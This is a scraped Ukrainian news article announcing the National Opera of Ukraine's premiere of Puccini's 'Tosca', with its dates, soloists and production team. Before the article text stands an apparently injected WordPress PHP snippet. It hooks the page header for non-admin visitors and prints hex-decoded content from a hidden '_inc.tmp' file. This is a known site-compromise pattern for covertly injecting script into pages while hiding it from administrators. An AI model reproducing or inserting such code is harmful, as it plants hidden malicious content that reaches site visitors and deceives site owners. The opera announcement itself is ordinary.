if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Прем’єра опери «Флорія Тоска» – 31 березня, 1, 9 та 30 квітня у Національній опері

Прем’єра опери «Флорія Тоска» – 31 березня, 1, 9 та 30 квітня у Національній опері

31 березня, 1, 9 та 30 квітня Національна опера України покаже нову постановку однієї з найбільш популярних, найкрасивіших і найдраматичніших опер видатного італійського композитора Джакомо Пуччіні – «Флорія Тоска».

«Флорія Тоска» – ще один яскравий приклад успішного творчого альянсу Національної опери України, Посольства Італії в Україні та Італійського інституту культури в Україні. Прем’єра приурочена до 60-річчя Римських договорів та до 25-річчя встановлення дипломатичних відносин між Україною та Італійською Республікою.

З того часу, як публіка вперше познайомилася з «Тоскою», світова прем’єра якої відбулася 14 січня 1900 року в Римській опері, а після цього – в міланській «Ла Скала», її незмінно супроводжує успіх. Потрапивши до програми того чи іншого театру, опера залишається надовго в репертуарі, а протягом останніх років все частіше світові сцени пропонують глядачеві сучасні версії цього шедевру.

В кількох закордонних постановках «Тоски» останніх років, наприклад, у х’юстонській «Гранд-опера», у «Метрополітен опера», в Опері Бастилії виконати партію головної героїні-красуні Флорії Тоски незмінно запрошують імениту українську співачку Людмилу Монастирську. Цікаво, що європейський дебют примадонни також ознаменувався партією Тоски в Німецькій опері в Берліні в 2010 році.

Приємний сюрприз чекає і на столичних любителів опери – солістка Національної опери України Людмила Монастирська співатиме партію Тоски у прем’єрній виставі. Монастирська чудово вживається в образ своєї героїні, їй підвладні всі емоції: від слів любові до викличного звернення до Бога, від шалених ревнощів до останнього несамовитого зойку, що передує фатальній смерті Скарпіа. А голос артистки світові критики називають розкішним, багатим, неймовірної сили й тембральної краси.

Неабиякий акторський талант – найважливіша особливість образу Тоски. Свого часу цю роль французький драматург Віктор’єн Сарду написав спеціально для геніальної Сари Бернар. Джакомо Пуччіні, побачивши акторку на сцені, утвердився у своєму бажанні створити оперу за цим твором.

На сцені Київської опери твір Дж. Пуччіні протягом ХХ століття мав вісім інтерпретацій.

Анатолій Солов’яненко, головний режисер театру, каже: «Разом з колегами – постановниками та виконавцями, намагаємось втілити характери та мотивації героїв, що закладені Пуччіні та Сарду, зробити їх близькими та зрозумілими для сучасного глядача. Це – вистава про любов, пристрасть та віру ліричних героїв, які гинуть в атмосфері цинізму та жорстокості, що їх оточує».

Постановники практично не відступали від оригіналу, максимально враховуючи всі нюанси, не «переписані» характери і мотивація героїв. Ця вистава про любов, надію, зраду, про те, що у всі часи знайдуться інтригани, що, граючи в цинічні ігри, ламають долі інших людей.

Завдяки співробітництву з Посольством Італії та Італійським інститутом культури в Україні у прем’єрі 31 березня партію Маріо Каварадоссі співатиме відомий італійський тенор Вальтер Борін (Valter Borin).

Наступні прем’єрні покази відбудуться 1, 9 та 30 квітня. Окрім Людмили Монастирської (31 березня і 30 квітня) партію Тоски виконуватимуть Оксана Крамарева та Вікторія Ченська. Роль Маріо Каварадоссі – Дмитро Кузьмін, Андрій Романенко, Сергій Скочеляс; барона Скарпіа – Геннадій Ващенко, Михайло Кірішев та Олександр Мельничук.

Постановний склад: режисер-постановник – Анатолій Солов’яненко, диригент-постановник – Микола Дядюра, сценографія та костюми – Марія Левитська, хормейстер-постановник – Богдан Пліш.

Прем’єра опери Джакомо Пуччіні «Флорія Тоска» на сцені Національної опери України, без перебільшення, стане головною подією сезону!

Флорія Тоска

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Статистика сторінки:
Переглядів сьогодні:
Переглядів у поточному місяці:
Відповідальність за зміст коментарів, що залишають відвідувачі, несуть їхні автори.
Популярне